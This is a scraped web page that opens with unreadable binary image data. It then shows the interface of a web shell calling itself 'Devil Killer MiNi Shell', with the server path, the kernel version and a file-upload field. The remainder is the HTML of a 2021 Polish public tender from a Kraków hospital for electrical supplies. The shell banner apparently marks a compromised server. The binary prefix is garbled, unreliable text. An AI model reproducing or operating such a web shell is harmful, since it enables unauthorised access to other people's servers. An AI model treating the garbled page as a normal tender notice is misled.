JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210730/0013259202-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00132592 z dnia 2021-07-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiałów instalacyjnych i elektrycznych (DFP.271.71.2021.AB) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ SZPITAL UNIWERSYTECKI W KRAKOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288685</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mikołaja Kopernika 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-501</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 424 72 16</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">abeben@su.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.su.krakow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiałów instalacyjnych i elektrycznych (DFP.271.71.2021.AB) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b917e6d5-ef9c-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00132592</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000573/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Materiały instalacyjne elektryczne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.su.krakow.pl/strefa-kontrahenta/zamowienia-publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.soldea.pl/epz/epz/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu komunikacja wykonawców z Zamawiającym będzie odbywała się za pośrednictwem kanału elektronicznej komunikacji: https://www.soldea.pl/epz/epz/ 2. Aktualne wymagania techniczne związane z korzystaniem z Platformy EPZ – wskazane są na stronie internetowej logowania i rejestracji Platformy - pod adresem https://www.soldea.pl/epz/epz/ 3. Sposób przesyłania plików (oferty, oświadczeń, dokumentów) za pośrednictwem Platformy EPZ oraz potwierdzenia złożenia plików zostały opisane w Instrukcjach (filmach) użytkowników Platformy EPZ. 4. Podmiotowe środki dowodowe, zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, niewystawione przez upoważnione podmioty, oraz pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. 5. W przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. 6. Zadawanie pytań przez Wykonawców odbywa się tylko w zakładce „Pytania do SWZ” na Platformie EPZ. Odpowiedzi na pytania Zamawiający zamieszcza na stronie internetowej prowadzonego postępowania https://www.su.krakow.pl/strefa-kontrahenta/zamowienia-publiczne. 7. Za datę wpływu ofert, oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę wygenerowaną przez Platformę EPZ. 8. Terminem przekazania informacji do wykonawcy przez Zamawiającego jest data wygenerowana przez Platformę EPZ. 9. Po terminie składnia ofert wykonawca znajdzie kierowane do niego wezwania lub informacje w zakładce „Do Wykonawcy”. 10. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 20 MB każdy w formatach: pdf, doc, docx, xls, xlsx, xades, xml, zip. Za pośrednictwem Platformy EPZ można przesłać wiele pojedynczych plików we wskazanym formacie lub plik archiwum (ZIP) zawierający wiele pojedynczych plików, w tym wypadku w dowolnym akceptowalnym przez Zamawiającego formacie. Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych sporządzania, wysyłania i odbierania plików w komunikacji elektronicznej znajdują się w pkt. 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO zawarte zostały w załączniku do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące RODO zawarte zostały w załączniku do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DFP.271.71.2021.AB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 154489,99 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	ŻARÓWKA -	100	szt. ;<br/>2.	ŻARÓWKA -	500	szt. ;<br/>3.	ŻARÓWKA -	100	szt. ;<br/>4.	ŻARÓWKA -	500	szt. ;<br/>5.	ŻARÓWKA	-	20	szt. ;<br/>6.	ŻARÓWKA -	20	szt. ;<br/>7.	Świetlówka	-	20	szt. ;<br/>8.	Świetlówka	-	200	szt. ;<br/>9.	Świetlówka -	50	szt. ;<br/>10.	Świetlówka	-	50	szt. ;<br/>11.	Świetlówka -	300	szt. ;<br/>12.	Świetlówka -	300	szt. ;<br/>13.	Świetlówka	-	100	szt. ;<br/>14.	Świetlówka -	100	szt. ;<br/>15.	Żarówka -	100	szt. ;<br/>16.	Żarówka	-	200	szt. ;<br/>17.	Żarówka -	100	szt. ;<br/>18.	Żarówka	-	1 000	szt. ;<br/>19.	Żarówka -	1 000	szt. ;<br/>20.	Żarówka	-	500	szt. ;<br/>21.	Żarówka	-	100	szt. ;<br/>22.	Żarówka -	50	szt. ;<br/>23.	Żarówka	-	100	szt. ;<br/>24.	Żarówka -	20	szt. ;<br/>25.	Żarówka -	20	szt. ;<br/>26.	Żarówka	-	20	szt. ;<br/>27.	Żarówka -	20	szt. ;<br/>28.	Żarówka -	20	szt. ;<br/>29.	Żarówka -	20	szt. ;<br/>30.	Żarówka -	20	szt. ;<br/>31.	Żarówka -	20	szt. ;<br/>32.	Świetlówka	-	30	szt. ;<br/>33.	Świetlówka -	20	szt. ;<br/>34.	Świetlówka -	10	szt. ;<br/>35.	Świetlówka -	20	szt. ;<br/>36.	Świetlówka	-	20	szt. ;<br/>37.	Świetlówka	-	20	szt. ;<br/>38.	Świetlówka -	20	szt. ;<br/>39.	Świetlówka -	20	szt. ;<br/>40.	Świetlówka -	20	szt. ;<br/>41.	Świetlówka -	30	szt. ;<br/>42.	Świetlówka -	20	szt. ;<br/>43.	Świetlówka -	40	szt. ;<br/>44.	Świetlówka	-	20	szt. ;<br/>45.	Świetlówka	-	20	szt. ;<br/>46.	Świetlówka	-	10	szt. ;<br/>47.	Świetlówka -	10	szt. ;<br/>48.	Świetlówka -	20	szt. ;<br/>49.	Świetlówka	-	10	szt. ;<br/>50.	Świetlówka -	10	szt. ;<br/>51.	Żarówka -	20	szt. ;<br/>52. Świetlówka -	20	szt. ;<br/>53.	Świetlówka	-	50	szt. ;<br/>54. Świetlówka -	50	szt. ;<br/>55.	Świetlówka -	50	szt. ;<br/>56. ŚWIETLÓWKA -	50	szt. ;<br/>57.	Żarówka -	20	sz.	;<br/>58.	Żarówka -	20	sz.	;<br/>59.	Żarnik -	10	sz.	;<br/>60.	Żarnik -	10	sz.	;<br/>61.	Żarówka -	20	sz.	;<br/>62.	Żarówka -	20	sz.	;<br/>63.	Świetlówka -	200	sz.	;<br/>64. Świetlówka -	20	sz.	; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 30166,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31680000-6 - Elektryczne artykuły i akcesoria</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Statecznik elektroniczny -	30	sz.	;<br/>2.	Statecznik elektroniczny -	30	sz.	;<br/>3.	Starter zapłonnik	-	200	sz.	;<br/>4.	Starter zapłonnik -	200	sz.	;<br/>5.	UKŁAD ZAPŁONOWY	-	10	sz.	;<br/>6.	PRZEWÓD -	100	sz.	;<br/>7.	PRZEWÓD	-	100	sz.	;<br/>8.	PRZEWÓD -	100	sz.	;<br/>9.	PRZEWÓD	-	300	sz.	;<br/>10.	PRZEWÓD -	100	sz.	;<br/>11.	PRZEWÓD -	100	sz.	;<br/>12.	PRZEWÓD -	100	sz.	;<br/>13.	PRZEWÓD -	1 000	sz.	;<br/>14.	PRZEWÓD -	1 000	sz.	;<br/>15.	PRZEWÓD	-	100	sz.	;<br/>16.	PRZEWÓD -	100	sz.	;<br/>17.	PRZEWÓD -	1 000	sz.	;<br/>18.	GNIAZDO	-	50	sz.	;<br/>19.	GNIAZDO	-	30	sz.	;<br/>20.	GNIAZDO	-	30	sz.	;<br/>21.	GNIAZDO -	10	sz.	;<br/>22.	GNIAZDO -	100	sz.	;<br/>23.	GNIAZDO	-	100	sz.	;<br/>24.	GNIAZDO -	50	sz.	;<br/>25.	GNIAZDO	-	5	sz.	;<br/>26.	GNIAZDO -	5	sz.	;<br/>27.	Oprawa -	10	sz.	;<br/>28.	Oprawa	-	10	sz.	;<br/>29.	Oprawa -	10	sz.	;<br/>30.	Oprawa	-	20	sz.	;<br/>31.	Oprawa	-	10	sz.	;<br/>32.	 Gniazdo	-	10	szt.	;<br/>33.	Plafoniera -	20	sz.	;<br/>34.	PUSZKA	-	100	sz.	;<br/>35.	PUSZKA	-	100	sz.	;<br/>36.	PUSZKA -	20	sz.	;<br/>37.	PUSZKA	-	100	sz.	;<br/>38.	PUSZKA -	100	sz.	;<br/>39.	RAMKA	-	100	sz.	;<br/>40.	RAMKA	-	50	sz.	;<br/>41.	RAMKA -	50	sz.	;<br/>42.	RAMKA -	20	sz.	;<br/>43. Rozdzielnica elektryczna	-	2	sz.	;<br/>44. Rozdzielnica elektryczna	-	2	sz.	;<br/>45.	ROZŁĄCZNIK -	2	sz.	;<br/>46.	Rura kablowa -	20	sz.	;<br/>47.	Rura kablowa -	20	sz.	;<br/>48.	Uchwyt	-	100	sz.	;<br/>49.	Uchwyt -	100	sz.	;<br/>50.	Złączka -	50	sz.	;<br/>51.	Złączka	-	50	sz.	;<br/>52.	Wkładka	-	50	sz.	;<br/>53.	Wkładka -	50	sz.	;<br/>54.	Wkładka	-	50	sz.	;<br/>55.	Wkładka	-	50	sz.	;<br/>56.	Wkładka -	20	sz.	;<br/>57.	Wkładka -	20	sz.	;<br/>58.	Wkładka	-	20	sz.	;<br/>59.	Wkładka	-	20	sz.	;<br/>60.	Wkładka	-	10	sz.	;<br/>61.	Wkładka	-	10	sz.	;<br/>62.	Wkładka -	10	sz.	;<br/>63.	Wkładka	-	10	sz.	;<br/>64.	Wkładka -	10	sz.	;<br/>65.	Wkładka	-	10	sz.	;<br/>66.	Wkładka	-	10	sz.	;<br/>67.	Wkładka	-	10	sz.	;<br/>68.	Wkładka -	10	sz.	;<br/>69.	WTYCZKA -	5	sz.	;<br/>70.	WTYCZKA -	5	sz.	;<br/>71.	WTYCZKA -	100	sz.	;<br/>72.	WYŁĄCZNIK	-	10	sz.	;<br/>73.	WYŁĄCZNIK -	10	sz.	;<br/>74.	WYŁĄCZNIK -	10	sz.	;<br/>75.	WYŁĄCZNIK	-	100	sz.	;<br/>76.	WYŁĄCZNIK	-	100	sz.	;<br/>77.	WYŁĄCZNIK -	10	sz.	;<br/>78.	WYŁĄCZNIK	-	10	sz.	;<br/>79.	WYŁĄCZNIK -	10	sz.	;<br/>80.	WYŁĄCZNIK -	10	sz.	;<br/>81.	WYŁĄCZNIK -	10	sz.	;<br/>82.	WYŁĄCZNIK -	10	sz.	;<br/>83.	WYŁĄCZNIK -	10	sz.	;<br/>84.	WYŁĄCZNIK -	10	sz.	;<br/>85.	WYŁĄCZNIK -	5	sz.	;<br/>86.	WYŁĄCZNIK -	5	sz.	;<br/>87.	WYŁĄCZNIK -	5	sz.	;<br/>88.	WYŁĄCZNIK -	5	sz.	;<br/>89.	WYŁĄCZNIK	-	5	sz.	;<br/>90.	WYŁĄCZNIK	-	5	sz.	;<br/>91.	WYŁĄCZNIK	-	5	sz.	;<br/>92.	WYŁĄCZNIK -	5	sz.	;<br/>93.	WYŁĄCZNIK -	5	sz.	;<br/>94.	WYŁĄCZNIK -	5	sz.	;<br/>95.	KLAWISZ DO ŁĄCZNIKA -	100	sz.	;<br/>96.	KLAWISZ DO ŁĄCZNIKA -	100	sz.	;<br/>97.	PRZEKAŹNIK -	2	sz.	;<br/>98.	SZYNA ŁĄCZENIOWA -	3	sz.	;<br/>99.	WYŁĄCZNIK -	3	sz.	;<br/>100.	WYŁĄCZNIK -	3	sz.	;<br/>101.	WYŁĄCZNIK -	5	sz.	;<br/>102.	Wyłącznik -	5	sz.	;<br/>103.	TAŚMA -	300	sz.	;<br/>104.	Taśma -	100	op.	;<br/>105.	Taśma	-	50	op.	;<br/>106.	Listwa -	10	sz.	;<br/>107.	Listwa -	10	sz.	;<br/>108.	Listwa -	100	sz.	;<br/>109.	Listwa	-	10	sz.	;<br/>110.	LISTWA -	10	sz.	;<br/>111.	LISTWA -	10	sz.	;<br/>112.	LISTWA -	5	sz.	;<br/>113.	LISTWA -	5	sz.	;<br/>114.	ZAMEK SZYFROWY -	3	sz.	;<br/>115.	Oprawka -	10	sz.	;<br/>116.	Oprawka -	10	sz.	;<br/>117.	Złączka -	400	sz.	;<br/>118.	Złączka -	200	sz.	;<br/>119.	Zaczep	-	10	sz.	;<br/>120.	Zaczep	-	10	sz.	;<br/>121.	Gniazdo	-	5	sz.	;<br/>122.	Dzwonek -	30	sz.	;<br/>123.	OPRAWA	-	20	sz.	;<br/>124.	Ramka -	20	sz.	;<br/>125.	PRZEWÓD -	300	sz.	;<br/>126.	Wkładka	-	30	sz.	;<br/>127.	Wkładka	-	30	sz.	;<br/>128.	Wkładka	-	30	sz.	;<br/>129.	Wkładka	-	30	sz.	;<br/>130.	Wkładka -	30	sz.	;<br/>131.	Wkładka -	30	szt.	;<br/>132.	Oprawa -	20	szt.	;<br/>133.	Wtyczka	-	10	szt.	;<br/>134.	Przycisk -	30	szt.	;<br/>135.	Przycisk -	30	szt.	;<br/>136.	Gniazdo -	100	szt.	;<br/>137.	Pokrywa	-	100	szt.	;<br/>138.	Ramka -	100	szt.	;<br/>139. Ramka -	50	szt.	;<br/>140.	Ramka	-	50	szt.	;<br/>141. PUSZKA	-	50	szt.	;<br/>142. PUSZKA -	50	szt.	;<br/>143.	Puszka -	50	szt.	;<br/>144.	Puszka -	30	szt.	;<br/>145. Puszka	-	30	szt.	;<br/>146. Łącznik -	100	szt.	;<br/>147.	Klawisz -	100	szt.	;<br/>148.	 Łącznik -	50	szt.	;<br/>149.	Klawisz -	50	szt.	;<br/>150.	GNIAZDO -	100	szt.	;<br/>151.	 Wyłącznik	-	20	szt.	; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 58727,49 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31680000-6 - Elektryczne artykuły i akcesoria</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Kabel instalacyjny	-	10 000	m	;<br/>2.	Panel porządkujący -	10	szt	;<br/>3.	Panel rozdzielczy	-	20	szt	;<br/>4.	Moduł -	1 000	szt	;<br/>5.	Pokrywa gniazd -	500	szt	;<br/>6.	Ramka -	100	szt	;<br/>7.	Ramka -	300	szt	;<br/>8.	Ramka	-	100	szt	;<br/>9.	Ramka	-	100	szt	;<br/>10.	Puszka -	100	szt	;<br/>11.	Puszka -	300	szt	;<br/>12.	Puszka -	100	szt	;<br/>13.	Puszka -	100	szt	;<br/>14.	Puszka -	300	szt	; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 51496,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31680000-6 - Elektryczne artykuły i akcesoria</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: 